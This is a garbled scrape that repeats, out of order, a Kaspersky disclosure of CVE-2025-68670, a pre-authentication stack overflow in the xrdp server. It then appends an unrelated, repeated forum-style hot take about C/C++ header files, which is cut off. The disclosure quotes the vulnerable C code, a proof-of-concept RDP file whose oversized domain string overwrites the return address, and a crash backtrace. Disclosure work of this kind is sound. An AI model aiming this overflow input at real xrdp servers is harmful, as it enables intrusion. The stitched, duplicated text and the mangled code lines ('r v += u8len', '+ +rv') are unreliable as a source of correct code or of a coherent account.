As seen in the code, if the first character of the domain name is an underscore (line [8]), a portion of the domain name – starting from the second character and ending with the double underscore (“__”) – is written into the resultIP buffer (line [9]). Since the domain name can be up to 512 bytes long, it may not fit into the buffer even if it’s technically well-formed (line [10]). Consequently, the overflow data will be written to the thread stack, potentially modifying the return address. If an attacker crafts a domain name that overflows the stack buffer and replaces the return address with a value they control, execution flow will shift according to the attacker’s intent upon returning from the vulnerable function, allowing for arbitrary code execution within the context of the compromised process (in this case, the xrdp server).To exploit this vulnerability, the attacker simply needs to specify a domain name that, after being converted to UTF-8, contains more than 256 bytes between the initial “_” and the subsequent “__”. Given that the conversion follows specific rules easily found online, this is a straightforward task: one can simply take advantage of the fact that the length of the same string can vary between UTF-16 and UTF-8. In short, this involves avoiding ASCII and certain other characters that may take up more space in UTF-16 than in UTF-8, while also being careful not to abuse characters that expand significantly after conversion. If the resulting UTF-8 domain name exceeds the 512-byte limit, a conversion error will occur.
PoC
As a PoC for the discovered vulnerability, we created the following RDP file containing the RDP server’s IP address and a long domain name designed to trigger a buffer overflow. In the domain name, we used a specific number of K (U+041A) characters to overwrite the return address with the string “AAAAAAAA”. The contents of the RDP file are shown below:
alternate full address:s:172.22.118.7
full address:s:172.22.118.7
domain:s:_veryveryveryverKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKeryveryveryveryveryveryveryveryveryveryveryveryveryveryveryveryveryveryveryveaaaaaaaaryveryveryveryveryveryveryveryveryveryveryveryverylongdoAAAAAAAA__0
username:s:testuser
When you open this file, the mstsc.exe process connects to the specified server. The server processes the data in the file and attempts to write the domain name into the buffer, which results in a buffer overflow and the overwriting of the return address. If you look at the xrdp memory dump at the time of the crash, you can see that both the buffer and the return address have been overwritten. The application terminates during the stack canary check. The example below was captured using the gdb debugger.
gef➤ bt
#0 __pthread_kill_implementation (no_tid=0x0, signo=0x6, threadid=0x7adb2dc71740) at ./nptl/pthread_kill.c:44
#1 __pthread_kill_internal (signo=0x6, threadid=0x7adb2dc71740) at ./nptl/pthread_kill.c:78
#2 __GI___pthread_kill (threadid=0x7adb2dc71740, signo=signo@entry=0x6) at./nptl/pthread_kill.c:89
#3 0x00007adb2da42476 in __GI_raise (sig=sig@entry=0x6) at ../sysdeps/posix/raise.c:26
#4 0x00007adb2da287f3 in __GI_abort () at ./stdlib/abort.c:79
#5 0x00007adb2da89677 in __libc_message (action=action@entry=do_abort, fmt=fmt@entry=0x7adb2dbdb92e "*** %s ***: terminated\n") at ../sysdeps/posix/libc_fatal.c:156
#6 0x00007adb2db3660a in __GI___fortify_fail (msg=msg@entry=0x7adb2dbdb916 "stack smashing detected") at ./debug/fortify_fail.c:26
#7 0x00007adb2db365d6 in __stack_chk_fail () at ./debug/stack_chk_fail.c:24
#8 0x000063654a2e5ad5 in ?? ()
#9 0x4141414141414141 in ?? ()
#10 0x00007adb00000a00 in ?? ()
#11 0x0000000000050004 in ?? ()
#12 0x00007fff91732220 in ?? ()
#13 0x000000000000030a in ?? ()
#14 0xfffffffffffffff8 in ?? ()
#15 0x000000052dc71740 in ?? ()
#16 0x3030305f70647278 in ?? ()
#17 0x616d5f6130333030 in ?? ()
#18 0x00636e79735f6e69 in ?? ()
#19 0x0000000000000000 in ?? ()Protection against vulnerability exploitation
It is worth noting that the vulnerable function can be protected by a stack canary via compiler settings. In most compilers, this option is enabled by default, which prevents an attacker from simply overwriting the return address and executing a ROP chain. To successfully exploit the vulnerability, the attacker would first need to obtain the canary value.The vulnerable function is also referenced by the xrdp_wm_show_edits function; however, even in that case, if the code is compiled with secure settings (using stack canaries), the most trivial exploitation scenario remains unfeasible.
Nevertheless, a stack canary is not a panacea. An attacker could potentially leak or guess its value, allowing them to overwrite the buffer and the return address while leaving the canary itself unchanged. In the security bulletin dedicated to CVE-2025-68670, the xrdp maintainers advise against relying solely on stack canaries when using the project.
Vulnerability remediation timeline
- 12/05/2025: we submitted the vulnerability report via github.com/neutrinolabs/xrdp/s…
- 12/05/2025: the project maintainers immediately confirmed receipt of the report and stated they would review it shortly.
- 12/15/2025: investigation and prioritization of the vulnerability began.
- 12/18/2025: the maintainers confirmed the vulnerability and began developing a patch.
- 12/24/2025: the vulnerability was assigned the identifier CVE-2025-68670.
- 01/27/2026: the patch was merged into the project’s main branch.
Conclusion
Taking a responsible approach to code makes not only our own products more solid but also enhances popular open-source projects. We have previously shared how security assessments of KasperskyOS-based solutions – such as Kaspersky Thin Client and Kaspersky IoT Secure Gateway – led to the discovery of several vulnerabilities in Suricata and FreeRDP, which project maintainers quickly patched. CVE-2025-68670 is yet another one of those stories.However, discovering a vulnerability is only half the battle. We would like to thank the xrdp maintainers for their rapid response to our report, for fixing the vulnerability, and for issuing a security bulletin detailing the issue and risk mitigation options.
-
CVE-2025-68670: discovering an RCE vulnerability in xrdp
In addition to KasperskyOS-powered solutions, Kaspersky offers various utility software to streamline business operations. For instance, users of Kaspersky Thin Client, an operating system for thin clients, can also purchase Kaspersky USB Redirector, a module that expands the capabilities of the xrdp remote desktop server for Linux. This module enables access to local USB devices, such as flash drives, tokens, smart cards, and printers, within a remote desktop session – all while maintaining connection security.
We take the security of our products seriously and regularly conduct security assessments. Kaspersky USB Redirector is no exception. Last year, during a security audit of this tool, we discovered a remote code execution vulnerability in the xrdp server, which was assigned the identifier CVE-2025-68670. We reported our findings to the project maintainers, who responded quickly: they fixed the vulnerability in version 0.10.5, backported the patch to versions 0.9.27 and 0.10.4.1, and issued a security bulletin. This post breaks down the details of CVE-2025-68670 and provides recommendations for staying protected.
Client data transmission via RDP
Establishing an RDP connection is a complex, multi-stage process where the client and server exchange various settings. In the context of the vulnerability we discovered, we are specifically interested in the Secure Settings Exchange, which occurs immediately before client authentication. At this stage, the client sends protected credentials to the server within a Client Info PDU (protocol data unit with client info): username, password, auto-reconnect cookies, and so on. These data points are bundled into a TS_INFO_PACKET structure and can be represented as Unicode strings up to 512 bytes long, the last of which must be a null terminator. In the xrdp code, this corresponds to the xrdp_client_info structure, which looks as follows:
{
[..SNIP..]
char username[INFO_CLIENT_MAX_CB_LEN];
char password[INFO_CLIENT_MAX_CB_LEN];
char domain[INFO_CLIENT_MAX_CB_LEN];
char program[INFO_CLIENT_MAX_CB_LEN];
char directory[INFO_CLIENT_MAX_CB_LEN];
[..SNIP..]
}
The value of the INFO_CLIENT_MAX_CB_LEN constant corresponds to the maximum string length and is defined as follows:
#define INFO_CLIENT_MAX_CB_LEN 512
When transmitting Unicode data, the client uses the UTF-16 encoding. However, the server converts the data to UTF-8 before saving it.
if (ts_info_utf16_in( //
[1] s, len_domain, self->rdp_layer->client_info.domain, sizeof(self->rdp_layer->client_info.domain)) != 0) //
[2]{
[..SNIP..]
}
The size of the buffer for unpacking the domain name in UTF-8 [2] is passed to the ts_info_utf16_in function [1], which implements buffer overflow protection [3].
static int ts_info_utf16_in(struct stream *s, int src_bytes, char *dst, int dst_len)
{
int rv = 0;
LOG_DEVEL(LOG_LEVEL_TRACE, "ts_info_utf16_in: uni_len %d, dst_len %d", src_bytes, dst_len);
if (!s_check_rem_and_log(s, src_bytes + 2, "ts_info_utf16_in"))
{
rv = 1;
}
else
{
int term;
int num_chars = in_utf16_le_fixed_as_utf8(s, src_bytes / 2,
dst, dst_len);
if (num_chars > dst_len) //
[3] {
LOG(LOG_LEVEL_ERROR, "ts_info_utf16_in: output buffer overflow"); rv = 1;
}
/ / String should be null-terminated. We haven't read the terminator yet
in_uint16_le(s, term);
if (term != 0)
{
LOG(LOG_LEVEL_ERROR, "ts_info_utf16_in: bad terminator. Expected 0, got %d", term);
rv = 1;
}
}
return rv;
}
Next, the in_utf16_le_fixed_as_utf8_proc function, where the actual data conversion from UTF-16 to UTF-8 takes place, checks the number of bytes written [4] as well as whether the string is null-terminated [5].
{
unsigned int rv = 0;
char32_t c32;
char u8str[MAXLEN_UTF8_CHAR];
unsigned int u8len;
char *saved_s_end = s->end;// Expansion of S_CHECK_REM(s, n*2) using passed-in file and line #ifdef USE_DEVEL_STREAMCHECK
parser_stream_overflow_check(s, n * 2, 0, file, line); #endif
// Temporarily set the stream end pointer to allow us to use
// s_check_rem() when reading in UTF-16 words
if (s->end - s->p > (int)(n * 2))
{
s->end = s->p + (int)(n * 2);
}while (s_check_rem(s, 2))
{
c32 = get_c32_from_stream(s);
u8len = utf_char32_to_utf8(c32, u8str);
if (u8len + 1 <= vn) //
[4] {
/* Room for this character and a terminator. Add the character */
unsigned int i;
for (i = 0 ; i < u8len ; ++i)
{
v[i] = u8str[i];
}v n -= u8len;
v += u8len;
}else if (vn > 1)
{
/* We've skipped a character, but there's more than one byte
* remaining in the output buffer. Mark the output buffer as
* full so we don't get a smaller character being squeezed into
* the remaining space */
vn = 1;
}r v += u8len;
}
// Restore stream to full length s->end = saved_s_end;
if (vn > 0)
{
*v = '\0'; //
[5] }
+ +rv;
return rv;
}
Consequently, up to 512 bytes of input data in UTF-16 are converted into UTF-8 data, which can also reach a size of up to 512 bytes.CVE-2025-68670: an RCE vulnerability in xrdp
The vulnerability exists within the xrdp_wm_parse_domain_information function, which processes the domain name saved on the server in UTF-8. Like the functions described above, this one is called before client authentication, meaning exploitation does not require valid credentials. The call stack below illustrates this.
x rdp_wm_parse_domain_information(char *originalDomainInfo, int comboMax,
int decode, char *resultBuffer)
xrdp_login_wnd_create(struct xrdp_wm *self)
xrdp_wm_init(struct xrdp_wm *self)
xrdp_wm_login_state_changed(struct xrdp_wm *self)
xrdp_wm_check_wait_objs(struct xrdp_wm *self)
xrdp_process_main_loop(struct xrdp_process *self)
The code snippet where the vulnerable function is called looks like this:
char resultIP[256]; //
[7][..SNIP..]
combo->item_index = xrdp_wm_parse_domain_information(
self->session->client_info->domain, //
[6] combo->data_list->count, 1,
resultIP /* just a dummy place holder, we ignore
*/ );
As you can see, the first argument of the function in line [6] is the domain name up to 512 bytes long. The final argument is the resultIP buffer of 256 bytes (as seen in line [7]). Now, let’s look at exactly what the vulnerable function does with these arguments.
static int
xrdp_wm_parse_domain_information(char *originalDomainInfo, int comboMax,
int decode, char *resultBuffer)
{
int ret;
int pos;
int comboxindex;
char index[2];/* If the first char in the domain name is '_' we use the domain name as IP*/
ret = 0; /* default return value */
/* resultBuffer assumed to be 256 chars */
g_memset(resultBuffer, 0, 256);
if (originalDomainInfo[0] == '_') //
[8] {
/* we try to locate a number indicating what combobox index the user
* prefer the information is loaded from domain field, from the client
* We must use valid chars in the domain name.
* Underscore is a valid name in the domain.
* Invalid chars are ignored in microsoft client therefore we use '_'
* again. this sec '__' contains the split for index.*/
pos = g_pos(&originalDomainInfo[1], "__"); //
[9] if (pos > 0)
{
/* an index is found we try to use it */
LOG(LOG_LEVEL_DEBUG, "domain contains index char __");
if (decode)
{
[..SNIP..]
}
/ * pos limit the String to only contain the IP */
g_strncpy(resultBuffer, &originalDomainInfo[1], pos); //
[10] }
else
{
LOG(LOG_LEVEL_DEBUG, "domain does not contain _");
g_strncpy(resultBuffer, &originalDomainInfo[1], 255);
}
}
return ret;
}
As seen in the code, if the first character of the domain name is an underscore (line [8]), a portion of the domain name – starting from the second character and ending with the double underscore (“__”) – is written into the resultIP buffer (line [9]). Since the domain name can be up to 512 bytes long, it may not fit into the buffer even if it’s technically well-formed (line [10]). Consequently, the overflow data will be written to the thread stack, potentially modifying the return address. If an attacker crafts a domain name that overflows the stack buffer and replaces the return address with a value they control, execution flow will shift according to the attacker’s intent upon returning from the vulnerable function, allowing for arbitrary code execution within the context of the compromised process (in this case, the xrdp server).To exploit this vulnerability, the attacker simply needs to specify a domain name that, after being converted to UTF-8, contains more than 256 bytes between the initial “_” and the subsequent “__”. Given that the conversion follows specific rules easily found online, this is a straightforward task: one can simply take advantage of the fact that the length of the same string can vary between UTF-16 and UTF-8. In short, this involves avoiding ASCII and certain other characters that may take up more space in UTF-16 than in UTF-8, while also being careful not to abuse characters that expand significantly after conversion. If the resulting UTF-8 domain name exceeds the 512-byte limit, a conversion error will occur.
PoC
As a PoC for the discovered vulnerability, we created the following RDP file containing the RDP server’s IP address and a long domain name designed to trigger a buffer overflow. In the domain name, we used a specific number of K (U+041A) characters to overwrite the return address with the string “AAAAAAAA”. The contents of the RDP file are shown below:
alternate full address:s:172.22.118.7
full address:s:172.22.118.7
domain:s:_veryveryveryverKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKeryveryveryveryveryveryveryveryveryveryveryveryveryveryveryveryveryveryveryveaaaaaaaaryveryveryveryveryveryveryveryveryveryveryveryverylongdoAAAAAAAA__0
username:s:testuser
When you open this file, the mstsc.exe process connects to the specified server. The server processes the data in the file and attempts to write the domain name into the buffer, which results in a buffer overflow and the overwriting of the return address. If you look at the xrdp memory dump at the time of the crash, you can see that both the buffer and the return address have been overwritten. The application terminates during the stack canary check. The example below was captured using the gdb debugger.
gef➤ bt
#0 __pthread_kill_implementation (no_tid=0x0, signo=0x6, threadid=0x7adb2dc71740) at ./nptl/pthread_kill.c:44
#1 __pthread_kill_internal (signo=0x6, threadid=0x7adb2dc71740) at ./nptl/pthread_kill.c:78
#2 __GI___pthread_kill (threadid=0x7adb2dc71740, signo=signo@entry=0x6) at./nptl/pthread_kill.c:89
#3 0x00007adb2da42476 in __GI_raise (sig=sig@entry=0x6) at ../sysdeps/posix/raise.c:26
#4 0x00007adb2da287f3 in __GI_abort () at ./stdlib/abort.c:79
#5 0x00007adb2da89677 in __libc_message (action=action@entry=do_abort, fmt=fmt@entry=0x7adb2dbdb92e "*** %s ***: terminated\n") at ../sysdeps/posix/libc_fatal.c:156
#6 0x00007adb2db3660a in __GI___fortify_fail (msg=msg@entry=0x7adb2dbdb916 "stack smashing detected") at ./debug/fortify_fail.c:26
#7 0x00007adb2db365d6 in __stack_chk_fail () at ./debug/stack_chk_fail.c:24
#8 0x000063654a2e5ad5 in ?? ()
#9 0x4141414141414141 in ?? ()
#10 0x00007adb00000a00 in ?? ()
#11 0x0000000000050004 in ?? ()
#12 0x00007fff91732220 in ?? ()
#13 0x000000000000030a in ?? ()
#14 0xfffffffffffffff8 in ?? ()
#15 0x000000052dc71740 in ?? ()
#16 0x3030305f70647278 in ?? ()
#17 0x616d5f6130333030 in ?? ()
#18 0x00636e79735f6e69 in ?? ()
#19 0x0000000000000000 in ?? ()Protection against vulnerability exploitation
It is worth noting that the vulnerable function can be protected by a stack canary via compiler settings. In most compilers, this option is enabled by default, which prevents an attacker from simply overwriting the return address and executing a ROP chain. To successfully exploit the vulnerability, the attacker would first need to obtain the canary value.The vulnerable function is also referenced by the xrdp_wm_show_edits function; however, even in that case, if the code is compiled with secure settings (using stack canaries), the most trivial exploitation scenario remains unfeasible.
Nevertheless, a stack canary is not a panacea. An attacker could potentially leak or guess its value, allowing them to overwrite the buffer and the return address while leaving the canary itself unchanged. In the security bulletin dedicated to CVE-2025-68670, the xrdp maintainers advise against relying solely on stack canaries when using the project.
Vulnerability remediation timeline
- 12/05/2025: we submitted the vulnerability report via github.com/neutrinolabs/xrdp/s…
- 12/05/2025: the project maintainers immediately confirmed receipt of the report and stated they would review it shortly.
- 12/15/2025: investigation and prioritization of the vulnerability began.
- 12/18/2025: the maintainers confirmed the vulnerability and began developing a patch.
- 12/24/2025: the vulnerability was assigned the identifier CVE-2025-68670.
- 01/27/2026: the patch was merged into the project’s main branch.
Conclusion
Taking a responsible approach to code makes not only our own products more solid but also enhances popular open-source projects. We have previously shared how security assessments of KasperskyOS-based solutions – such as Kaspersky Thin Client and Kaspersky IoT Secure Gateway – led to the discovery of several vulnerabilities in Suricata and FreeRDP, which project maintainers quickly patched. CVE-2025-68670 is yet another one of those stories.However, discovering a vulnerability is only half the battle. We would like to thank the xrdp maintainers for their rapid response to our report, for fixing the vulnerability, and for issuing a security bulletin detailing the issue and risk mitigation options.
-
CVE-2025-68670: discovering an RCE vulnerability in xrdp
In addition to KasperskyOS-powered solutions, Kaspersky offers various utility software to streamline business operations. For instance, users of Kaspersky Thin Client, an operating system for thin clients, can also purchase Kaspersky USB Redirector, a module that expands the capabilities of the xrdp remote desktop server for Linux. This module enables access to local USB devices, such as flash drives, tokens, smart cards, and printers, within a remote desktop session – all while maintaining connection security.
We take the security of our products seriously and regularly conduct security assessments. Kaspersky USB Redirector is no exception. Last year, during a security audit of this tool, we discovered a remote code execution vulnerability in the xrdp server, which was assigned the identifier CVE-2025-68670. We reported our findings to the project maintainers, who responded quickly: they fixed the vulnerability in version 0.10.5, backported the patch to versions 0.9.27 and 0.10.4.1, and issued a security bulletin. This post breaks down the details of CVE-2025-68670 and provides recommendations for staying protected.
Client data transmission via RDP
Establishing an RDP connection is a complex, multi-stage process where the client and server exchange various settings. In the context of the vulnerability we discovered, we are specifically interested in the Secure Settings Exchange, which occurs immediately before client authentication. At this stage, the client sends protected credentials to the server within a Client Info PDU (protocol data unit with client info): username, password, auto-reconnect cookies, and so on. These data points are bundled into a TS_INFO_PACKET structure and can be represented as Unicode strings up to 512 bytes long, the last of which must be a null terminator. In the xrdp code, this corresponds to the xrdp_client_info structure, which looks as follows:
{
[..SNIP..]
char username[INFO_CLIENT_MAX_CB_LEN];
char password[INFO_CLIENT_MAX_CB_LEN];
char domain[INFO_CLIENT_MAX_CB_LEN];
char program[INFO_CLIENT_MAX_CB_LEN];
char directory[INFO_CLIENT_MAX_CB_LEN];
[..SNIP..]
}
The value of the INFO_CLIENT_MAX_CB_LEN constant corresponds to the maximum string length and is defined as follows:
#define INFO_CLIENT_MAX_CB_LEN 512
When transmitting Unicode data, the client uses the UTF-16 encoding. However, the server converts the data to UTF-8 before saving it.
if (ts_info_utf16_in( //
[1] s, len_domain, self->rdp_layer->client_info.domain, sizeof(self->rdp_layer->client_info.domain)) != 0) //
[2]{
[..SNIP..]
}
The size of the buffer for unpacking the domain name in UTF-8 [2] is passed to the ts_info_utf16_in function [1], which implements buffer overflow protection [3].
static int ts_info_utf16_in(struct stream *s, int src_bytes, char *dst, int dst_len)
{
int rv = 0;
LOG_DEVEL(LOG_LEVEL_TRACE, "ts_info_utf16_in: uni_len %d, dst_len %d", src_bytes, dst_len);
if (!s_check_rem_and_log(s, src_bytes + 2, "ts_info_utf16_in"))
{
rv = 1;
}
else
{
int term;
int num_chars = in_utf16_le_fixed_as_utf8(s, src_bytes / 2,
dst, dst_len);
if (num_chars > dst_len) //
[3] {
LOG(LOG_LEVEL_ERROR, "ts_info_utf16_in: output buffer overflow"); rv = 1;
}
/ / String should be null-terminated. We haven't read the terminator yet
in_uint16_le(s, term);
if (term != 0)
{
LOG(LOG_LEVEL_ERROR, "ts_info_utf16_in: bad terminator. Expected 0, got %d", term);
rv = 1;
}
}
return rv;
}
Next, the in_utf16_le_fixed_as_utf8_proc function, where the actual data conversion from UTF-16 to UTF-8 takes place, checks the number of bytes written [4] as well as whether the string is null-terminated [5].
{
unsigned int rv = 0;
char32_t c32;
char u8str[MAXLEN_UTF8_CHAR];
unsigned int u8len;
char *saved_s_end = s->end;// Expansion of S_CHECK_REM(s, n*2) using passed-in file and line #ifdef USE_DEVEL_STREAMCHECK
parser_stream_overflow_check(s, n * 2, 0, file, line); #endif
// Temporarily set the stream end pointer to allow us to use
// s_check_rem() when reading in UTF-16 words
if (s->end - s->p > (int)(n * 2))
{
s->end = s->p + (int)(n * 2);
}while (s_check_rem(s, 2))
{
c32 = get_c32_from_stream(s);
u8len = utf_char32_to_utf8(c32, u8str);
if (u8len + 1 <= vn) //
[4] {
/* Room for this character and a terminator. Add the character */
unsigned int i;
for (i = 0 ; i < u8len ; ++i)
{
v[i] = u8str[i];
}v n -= u8len;
v += u8len;
}else if (vn > 1)
{
/* We've skipped a character, but there's more than one byte
* remaining in the output buffer. Mark the output buffer as
* full so we don't get a smaller character being squeezed into
* the remaining space */
vn = 1;
}r v += u8len;
}
// Restore stream to full length s->end = saved_s_end;
if (vn > 0)
{
*v = '\0'; //
[5] }
+ +rv;
return rv;
}
Consequently, up to 512 bytes of input data in UTF-16 are converted into UTF-8 data, which can also reach a size of up to 512 bytes.CVE-2025-68670: an RCE vulnerability in xrdp
The vulnerability exists within the xrdp_wm_parse_domain_information function, which processes the domain name saved on the server in UTF-8. Like the functions described above, this one is called before client authentication, meaning exploitation does not require valid credentials. The call stack below illustrates this.
x rdp_wm_parse_domain_information(char *originalDomainInfo, int comboMax,
int decode, char *resultBuffer)
xrdp_login_wnd_create(struct xrdp_wm *self)
xrdp_wm_init(struct xrdp_wm *self)
xrdp_wm_login_state_changed(struct xrdp_wm *self)
xrdp_wm_check_wait_objs(struct xrdp_wm *self)
xrdp_process_main_loop(struct xrdp_process *self)
The code snippet where the vulnerable function is called looks like this:
char resultIP[256]; //
[7][..SNIP..]
combo->item_index = xrdp_wm_parse_domain_information(
self->session->client_info->domain, //
[6] combo->data_list->count, 1,
resultIP /* just a dummy place holder, we ignore
*/ );
As you can see, the first argument of the function in line [6] is the domain name up to 512 bytes long. The final argument is the resultIP buffer of 256 bytes (as seen in line [7]). Now, let’s look at exactly what the vulnerable function does with these arguments.
static int
xrdp_wm_parse_domain_information(char *originalDomainInfo, int comboMax,
int decode, char *resultBuffer)
{
int ret;
int pos;
int comboxindex;
char index[2];/* If the first char in the domain name is '_' we use the domain name as IP*/
ret = 0; /* default return value */
/* resultBuffer assumed to be 256 chars */
g_memset(resultBuffer, 0, 256);
if (originalDomainInfo[0] == '_') //
[8] {
/* we try to locate a number indicating what combobox index the user
* prefer the information is loaded from domain field, from the client
* We must use valid chars in the domain name.
* Underscore is a valid name in the domain.
* Invalid chars are ignored in microsoft client therefore we use '_'
* again. this sec '__' contains the split for index.*/
pos = g_pos(&originalDomainInfo[1], "__"); //
[9] if (pos > 0)
{
/* an index is found we try to use it */
LOG(LOG_LEVEL_DEBUG, "domain contains index char __");
if (decode)
{
[..SNIP..]
}
/ * pos limit the String to only contain the IP */
g_strncpy(resultBuffer, &originalDomainInfo[1], pos); //
[10] }
else
{
LOG(LOG_LEVEL_DEBUG, "domain does not contain _");
g_strncpy(resultBuffer, &originalDomainInfo[1], 255);
}
}
return ret;
}
As seen in the code, if the first character of the domain name is an underscore (line [8]), a portion of the domain name – starting from the second character and ending with the double underscore (“__”) – is written into the resultIP buffer (line [9]). Since the domain name can be up to 512 bytes long, it may not fit into the buffer even if it’s technically well-formed (line [10]). Consequently, the overflow data will be written to the thread stack, potentially modifying the return address. If an attacker crafts a domain name that overflows the stack buffer and replaces the return address with a value they control, execution flow will shift according to the attacker’s intent upon returning from the vulnerable function, allowing for arbitrary code execution within the context of the compromised process (in this case, the xrdp server).To exploit this vulnerability, the attacker simply needs to specify a domain name that, after being converted to UTF-8, contains more than 256 bytes between the initial “_” and the subsequent “__”. Given that the conversion follows specific rules easily found online, this is a straightforward task: one can simply take advantage of the fact that the length of the same string can vary between UTF-16 and UTF-8. In short, this involves avoiding ASCII and certain other characters that may take up more space in UTF-16 than in UTF-8, while also being careful not to abuse characters that expand significantly after conversion. If the resulting UTF-8 domain name exceeds the 512-byte limit, a conversion error will occur.
PoC
As a PoC for the discovered vulnerability, we created the following RDP file containing the RDP server’s IP address and a long domain name designed to trigger a buffer overflow. In the domain name, we used a specific number of K (U+041A) characters to overwrite the return address with the string “AAAAAAAA”. The contents of the RDP file are shown below:
alternate full address:s:172.22.118.7
full address:s:172.22.118.7
domain:s:_veryveryveryverKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKeryveryveryveryveryveryveryveryveryveryveryveryveryveryveryveryveryveryveryveaaaaaaaaryveryveryveryveryveryveryveryveryveryveryveryverylongdoAAAAAAAA__0
username:s:testuser
When you open this file, the mstsc.exe process connects to the specified server. The server processes the data in the file and attempts to write the domain name into the buffer, which results in a buffer overflow and the overwriting of the return address. If you look at the xrdp memory dump at the time of the crash, you can see that both the buffer and the return address have been overwritten. The application terminates during the stack canary check. The example below was captured using the gdb debugger.
gef➤ bt
#0 __pthread_kill_implementation (no_tid=0x0, signo=0x6, threadid=0x7adb2dc71740) at ./nptl/pthread_kill.c:44
#1 __pthread_kill_internal (signo=0x6, threadid=0x7adb2dc71740) at ./nptl/pthread_kill.c:78
#2 __GI___pthread_kill (threadid=0x7adb2dc71740, signo=signo@entry=0x6) at./nptl/pthread_kill.c:89
#3 0x00007adb2da42476 in __GI_raise (sig=sig@entry=0x6) at ../sysdeps/posix/raise.c:26
#4 0x00007adb2da287f3 in __GI_abort () at ./stdlib/abort.c:79
#5 0x00007adb2da89677 in __libc_message (action=action@entry=do_abort, fmt=fmt@entry=0x7adb2dbdb92e "*** %s ***: terminated\n") at ../sysdeps/posix/libc_fatal.c:156
#6 0x00007adb2db3660a in __GI___fortify_fail (msg=msg@entry=0x7adb2dbdb916 "stack smashing detected") at ./debug/fortify_fail.c:26
#7 0x00007adb2db365d6 in __stack_chk_fail () at ./debug/stack_chk_fail.c:24
#8 0x000063654a2e5ad5 in ?? ()
#9 0x4141414141414141 in ?? ()
#10 0x00007adb00000a00 in ?? ()
#11 0x0000000000050004 in ?? ()
#12 0x00007fff91732220 in ?? ()
#13 0x000000000000030a in ?? ()
#14 0xfffffffffffffff8 in ?? ()
#15 0x000000052dc71740 in ?? ()
#16 0x3030305f70647278 in ?? ()
#17 0x616d5f6130333030 in ?? ()
#18 0x00636e79735f6e69 in ?? ()
#19 0x0000000000000000 in ?? ()Protection against vulnerability exploitation
It is worth noting that the vulnerable function can be protected by a stack canary via compiler settings. In most compilers, this option is enabled by default, which prevents an attacker from simply overwriting the return address and executing a ROP chain. To successfully exploit the vulnerability, the attacker would first need to obtain the canary value.The vulnerable function is also referenced by the xrdp_wm_show_edits function; however, even in that case, if the code is compiled with secure settings (using stack canaries), the most trivial exploitation scenario remains unfeasible.
Nevertheless, a stack canary is not a panacea. An attacker could potentially leak or guess its value, allowing them to overwrite the buffer and the return address while leaving the canary itself unchanged. In the security bulletin dedicated to CVE-2025-68670, the xrdp maintainers advise against relying solely on stack canaries when using the project.
Vulnerability remediation timeline
- 12/05/2025: we submitted the vulnerability report via github.com/neutrinolabs/xrdp/s…
- 12/05/2025: the project maintainers immediately confirmed receipt of the report and stated they would review it shortly.
- 12/15/2025: investigation and prioritization of the vulnerability began.
- 12/18/2025: the maintainers confirmed the vulnerability and began developing a patch.
- 12/24/2025: the vulnerability was assigned the identifier CVE-2025-68670.
- 01/27/2026: the patch was merged into the project’s main branch.
Conclusion
Taking a responsible approach to code makes not only our own products more solid but also enhances popular open-source projects. We have previously shared how security assessments of KasperskyOS-based solutions – such as Kaspersky Thin Client and Kaspersky IoT Secure Gateway – led to the discovery of several vulnerabilities in Suricata and FreeRDP, which project maintainers quickly patched. CVE-2025-68670 is yet another one of those stories.However, discovering a vulnerability is only half the battle. We would like to thank the xrdp maintainers for their rapid response to our report, for fixing the vulnerability, and for issuing a security bulletin detailing the issue and risk mitigation options.
-
CW: C/C++ hot take
as far as I can tell header files have no advantages over just putting your forward declarations at the top of your
.c/.cppfileslike it’s bad enough that you have to declare everything twice, but putting your second declaration in a totally separate file that you have to remember to keep updated? that will definitely bite you in the ass
also the existence of header files requires you to use some arcane rube goldberg build system like
makethat’s held together with chewing gum and rubber bands, and probably isn’t even portable. when instead you could literally just include your.c/.cppfiles directly and bypass that whole processand it’s not even hard to write a
.c/.cppfile that doesn’t need a headerfile:// inside of funcs.cpp: #ifndef FUNCS_CPP #define FUNCS_CPP int someFunc(); int someFunc() { return 666; } #endif // and you just import it like this: #include "./funcs.cpp"like why didn’t people figure this out decades ago. who even thought that headerfiles were a good idea. maybe I’m missing something but they genuinely seem to have only downsides and aren’t even the obvious way to solve this problem?
-
CW: C/C++ hot take
as far as I can tell header files have no advantages over just putting your forward declarations at the top of your
.c/.cppfileslike it’s bad enough that you have to declare everything twice, but putting your second declaration in a totally separate file that you have to remember to keep updated? that will definitely bite you in the ass
also the existence of header files requires you to use some arcane rube goldberg build system like
makethat’s held together with chewing gum and rubber bands, and probably isn’t even portable. when instead you could literally just include your.c/.cppfiles directly and bypass that whole processand it’s not even hard to write a
.c/.cppfile that doesn’t need a headerfile:// inside of funcs.cpp: #ifndef FUNCS_CPP #define FUNCS_CPP int someFunc(); int someFunc() { return 666; } #endif // and you just import it like this: #include "./funcs.cpp"like why didn’t people figure this out decades ago. who even thought that headerfiles were a good idea. maybe I’m missing something but they genuinely seem to have only downsides and aren’t even the obvious way to solve this problem?
-
CW: C/C++ hot take
as far as I can tell header files have no advantages over just putting your forward declarations at the top of your
.c/.cppfileslike it’s bad enough that you have to declare everything twice, but putting your second declaration in a totally separate file that you have to remember to keep updated? that will definitely bite you in the ass
also the existence of header files requires you to use some arcane rube goldberg build system like
makethat’s held together with chewing gum and rubber bands, and probably isn’t even portable. when instead you could literally just include your.c/.cppfiles directly and bypass that whole processand it’s not even hard to write a
.c/.cppfile that doesn’t need a headerfile:// inside of funcs.cpp: #ifndef FUNCS_CPP #define FUNCS_CPP int someFunc(); int someFunc() { return 666; } #endif // and you just import it like this: #include "./funcs.cpp"like why didn’t people figure this out decades ago. who even thought that headerfiles were a good idea. maybe I’m missing something but they genuinely seem to have only downsides and aren’t even the obvious way to solve this problem?
-
CW: C/C++ hot take
as far as I can tell header files have no advantages over just putting your forward declarations at the top of your
.c/.cppfileslike it’s bad enough that you have to declare everything twice, but putting your second declaration in a totally separate file that you have to remember to keep updated? that will definitely bite you in the ass
also the existence of header files requires you to use some arcane rube goldberg build system like
